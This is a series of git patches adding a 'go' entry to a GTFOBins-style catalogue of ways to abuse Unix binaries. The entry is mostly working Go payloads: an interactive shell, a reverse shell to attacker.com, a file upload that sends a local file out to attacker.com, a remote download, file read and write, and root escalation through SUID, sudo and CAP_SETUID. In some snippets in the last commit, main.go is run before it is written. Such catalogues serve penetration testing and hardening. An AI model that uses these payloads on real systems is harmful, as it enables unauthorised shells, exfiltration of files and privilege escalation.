From 2764902f8944f78ee9de8a66aea5887d324108e4 Mon Sep 17 00:00:00 2001 From: Anonymous ethc4 Date: Wed, 27 Aug 2025 06:49:28 -0400 Subject: [PATCH 1/3] Create go.md --- _gtfobins/go.md | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 _gtfobins/go.md diff --git a/_gtfobins/go.md b/_gtfobins/go.md new file mode 100644 index 00000000..8d136094 --- /dev/null +++ b/_gtfobins/go.md @@ -0,0 +1,25 @@ +--- +description: Go compiler binary. Can be abused to execute arbitrary commands or escalate privileges if run as root. +functions: + command: + - code: | + # Execute arbitrary commands using a temporary Go module + CMD="id" + mkdir /tmp/gomod && cd /tmp/gomod + go mod init mod + echo "package main; import \"os/exec\"; func main() { exec.Command(\"/bin/sh\",\"-c\",\"$CMD\").Run() }" > main.go + go run main.go + sudo: + - code: | + # Execute arbitrary commands as root + CMD="id" + mkdir /tmp/gomod && cd /tmp/gomod + sudo go mod init mod + echo "package main; import \"os/exec\"; func main() { exec.Command(\"/bin/sh\",\"-c\",\"$CMD\").Run() }" > main.go + sudo go run main.go +notes: + - "This abuses `go run` to execute arbitrary shell commands by creating a temporary Go module." + - "Requires Go compiler installed." + - "If run with root privileges, any command can be executed as root." + - "Temporary files are created in /tmp/gomod." +--- From 0634c357bad53d0a4b53bb9a66109c2d96b0593a Mon Sep 17 00:00:00 2001 From: Anonymous ethc4 Date: Wed, 27 Aug 2025 07:00:42 -0400 Subject: [PATCH 2/3] Update go.md Fixed A Bug with the GO Code --- _gtfobins/go.md | 72 +++++++++++++++++++++++++++++++++++++++---------- 1 file changed, 58 insertions(+), 14 deletions(-) diff --git a/_gtfobins/go.md b/_gtfobins/go.md index 8d136094..ddeef8c5 100644 --- a/_gtfobins/go.md +++ b/_gtfobins/go.md @@ -1,25 +1,69 @@ --- description: Go compiler binary. Can be abused to execute arbitrary commands or escalate privileges if run as root. functions: - command: + command-exec: - code: | - # Execute arbitrary commands using a temporary Go module - CMD="id" - mkdir /tmp/gomod && cd /tmp/gomod + # Execute arbitrary commands using Go and Bash heredoc + COMMAND="id" + mkdir -p /tmp/gomod && cd /tmp/gomod go mod init mod - echo "package main; import \"os/exec\"; func main() { exec.Command(\"/bin/sh\",\"-c\",\"$CMD\").Run() }" > main.go - go run main.go + cat > main.go << EOF + package main + + import ( + "fmt" + "os" + "os/exec" + ) + + func main() { + if len(os.Args) < 2 { + fmt.Println("Usage: go run main.go ") + return + } + cmd := exec.Command("/bin/sh", "-c", os.Args[1]) + output, err := cmd.CombinedOutput() + if err != nil { + fmt.Printf("Error executing command: %v\n", err) + return + } + fmt.Printf(string(output)) + } + EOF + go run main.go "$COMMAND" sudo: - code: | # Execute arbitrary commands as root - CMD="id" - mkdir /tmp/gomod && cd /tmp/gomod + COMMAND="id" + mkdir -p /tmp/gomod && cd /tmp/gomod sudo go mod init mod - echo "package main; import \"os/exec\"; func main() { exec.Command(\"/bin/sh\",\"-c\",\"$CMD\").Run() }" > main.go - sudo go run main.go + cat > main.go << EOF + package main + + import ( + "fmt" + "os" + "os/exec" + ) + + func main() { + if len(os.Args) < 2 { + fmt.Println("Usage: go run main.go ") + return + } + cmd := exec.Command("/bin/sh", "-c", os.Args[1]) + output, err := cmd.CombinedOutput() + if err != nil { + fmt.Printf("Error executing command: %v\n", err) + return + } + fmt.Printf(string(output)) + } + EOF + sudo go run main.go "$COMMAND" notes: - - "This abuses `go run` to execute arbitrary shell commands by creating a temporary Go module." - - "Requires Go compiler installed." - - "If run with root privileges, any command can be executed as root." - - "Temporary files are created in /tmp/gomod." + - "Creates a temporary Go module in /tmp/gomod and writes a Go program using heredoc." + - "Command to execute is passed as an argument to the Go program." + - "Works for normal user or with root (sudo)." + - "Temporary files are created in /tmp/gomod; cleanup recommended after use." --- From f1521d999ad153f8550a57056bb24114cef39d58 Mon Sep 17 00:00:00 2001 From: Anonymous ethc4 Date: Wed, 27 Aug 2025 08:22:57 -0400 Subject: [PATCH 3/3] Update go.md Updated go.md --- _gtfobins/go.md | 202 ++++++++++++++++++++++++++++++++++++++---------- 1 file changed, 160 insertions(+), 42 deletions(-) diff --git a/_gtfobins/go.md b/_gtfobins/go.md index ddeef8c5..033ee8f3 100644 --- a/_gtfobins/go.md +++ b/_gtfobins/go.md @@ -1,69 +1,187 @@ --- -description: Go compiler binary. Can be abused to execute arbitrary commands or escalate privileges if run as root. +description: The payloads are compatible with Go (requires `go` compiler). functions: - command-exec: + shell: - code: | - # Execute arbitrary commands using Go and Bash heredoc - COMMAND="id" - mkdir -p /tmp/gomod && cd /tmp/gomod - go mod init mod - cat > main.go << EOF + cat > main.go << 'EOF' + package main + + import ( + "os" + "os/exec" + ) + + func main() { + cmd := exec.Command("/bin/sh") + cmd.Stdin = os.Stdin + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.Run() + } + EOF + go run main.go + + reverse-shell: + - description: Run ``nc -lvnp 12345`` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + cat > main.go << 'EOF' + package main + + import ( + "net" + "os" + "os/exec" + ) + + func main() { + c, _ := net.Dial("tcp", os.Getenv("RHOST")+":"+os.Getenv("RPORT")) + cmd := exec.Command("/bin/sh") + cmd.Stdin, cmd.Stdout, cmd.Stderr = c, c, c + cmd.Run() + } + EOF + go run main.go + + file-upload: + - description: Send local file via HTTP POST request. + code: | + export URL=http://attacker.com/upload + export LFILE=file_to_send + cat > main.go << 'EOF' + package main + + import ( + "bytes" + "net/http" + "os" + ) + + func main() { + data, _ := os.ReadFile(os.Getenv("LFILE")) + http.Post(os.Getenv("URL"), "application/octet-stream", bytes.NewReader(data)) + } + EOF + go run main.go + + file-download: + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + cat > main.go << 'EOF' + package main + + import ( + "io" + "net/http" + "os" + ) + + func main() { + r, _ := http.Get(os.Getenv("URL")) + defer r.Body.Close() + f, _ := os.Create(os.Getenv("LFILE")) + defer f.Close() + io.Copy(f, r.Body) + } + EOF + go run main.go + + file-write: + - code: | + cat > main.go << 'EOF' + package main + + import "os" + + func main() { + os.WriteFile("file_to_write", []byte("DATA"), 0644) + } + EOF + go run main.go + + file-read: + - code: | + export LFILE=file_to_read + cat > main.go << 'EOF' package main import ( "fmt" "os" + ) + + func main() { + data, _ := os.ReadFile(os.Getenv("LFILE")) + fmt.Print(string(data)) + } + EOF + go run main.go + + suid: + - code: | + ./go run main.go + # with the `main.go` containing: + # os/exec to spawn sh with -p + cat > main.go << 'EOF' + package main + + import ( + "os" "os/exec" ) func main() { - if len(os.Args) < 2 { - fmt.Println("Usage: go run main.go ") - return - } - cmd := exec.Command("/bin/sh", "-c", os.Args[1]) - output, err := cmd.CombinedOutput() - if err != nil { - fmt.Printf("Error executing command: %v\n", err) - return - } - fmt.Printf(string(output)) + cmd := exec.Command("/bin/sh", "-p") + cmd.Stdin = os.Stdin + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.Run() } EOF - go run main.go "$COMMAND" + ./go run main.go + sudo: - code: | - # Execute arbitrary commands as root - COMMAND="id" - mkdir -p /tmp/gomod && cd /tmp/gomod - sudo go mod init mod - cat > main.go << EOF + sudo go run main.go + # with main.go containing: + cat > main.go << 'EOF' + package main + + import ( + "os" + "os/exec" + ) + + func main() { + cmd := exec.Command("/bin/sh") + cmd.Stdin, cmd.Stdout, cmd.Stderr = os.Stdin, os.Stdout, os.Stderr + cmd.Run() + } + EOF + sudo go run main.go + + capabilities: + - code: | + ./go run main.go + # binary must have CAP_SETUID set + cat > main.go << 'EOF' package main import ( - "fmt" "os" "os/exec" + "syscall" ) func main() { - if len(os.Args) < 2 { - fmt.Println("Usage: go run main.go ") - return - } - cmd := exec.Command("/bin/sh", "-c", os.Args[1]) - output, err := cmd.CombinedOutput() - if err != nil { - fmt.Printf("Error executing command: %v\n", err) - return - } - fmt.Printf(string(output)) + syscall.Setuid(0) + cmd := exec.Command("/bin/sh") + cmd.Stdin, cmd.Stdout, cmd.Stderr = os.Stdin, os.Stdout, os.Stderr + cmd.Run() } EOF - sudo go run main.go "$COMMAND" -notes: - - "Creates a temporary Go module in /tmp/gomod and writes a Go program using heredoc." - - "Command to execute is passed as an argument to the Go program." - - "Works for normal user or with root (sudo)." - - "Temporary files are created in /tmp/gomod; cleanup recommended after use." + ./go run main.go ---